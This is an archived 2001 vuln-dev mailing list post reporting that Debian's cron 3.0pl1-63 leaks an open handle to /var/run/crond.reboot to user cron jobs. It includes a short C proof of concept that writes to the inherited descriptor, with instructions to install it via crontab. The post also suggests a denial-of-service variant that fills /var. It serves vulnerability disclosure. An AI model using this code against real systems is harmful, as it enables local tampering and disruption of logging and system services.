Vulnerability Development mailing list archives
[mtoseland () cableinet co uk: cron 3.0.pl1-63 doesn't close filehandles, compromises /var/run/crond.reboot from any user]
From: Matthew Toseland <mtoseland () CABLEINET CO UK>
Date: Mon, 26 Feb 2001 22:00:57 +0000
This appears to be debian-specific. How to exploit, other than DoS attacks/quota bypass? What does /var/run/crond.reboot do? BTW, is fixed now and appears to be debian-specific. Ben Greenbaum said post to vuln-dev.
--- Begin Message --- From: Matthew Toseland <mtoseland () cableinet co uk>
Date: Sun, 25 Feb 2001 01:49:39 +0000
Hi. I have discovered a problem with the cron 3.0pl1-63 in woody. It does not close /var/run/crond.reboot when it forks and setuids. So any user who has a crontab can write to /var/run/crond.reboot, which is created with permissions 0000 and user/group root/root. This may or may not be exploitable for elevated privelidge, but at the very least could be a quota violation or similar, leading to local DoS of the /var filesystem, hence disabling logging, mail, restarting of system daemons... on most systems. Note that this only works if there is a /var/run/crond.reboot. Sample code: #include <stdio.h> #include <unistd.h> void main() { char* p = "hahahahahahahahahahahahahahahahahahahaha\n"; int x = strlen(p); write(6,p,x-1); close(6); } Compile and insert into your crontab. DoS variant is obvious. Is this a known problem? Is it fixed now? (my debian stopped updating because of local problems for a while). When will it be fixed? I will post to bugtraq in a week or so - this is your chance to fix it quickly before it becomes general knowledge - if it hasn't already become general knowledge amoung blackhats.
--- End Message ---
Current thread:
- [mtoseland () cableinet co uk: cron 3.0.pl1-63 doesn't close filehandles, compromises /var/run/crond.reboot from any user] Matthew Toseland (Feb 26)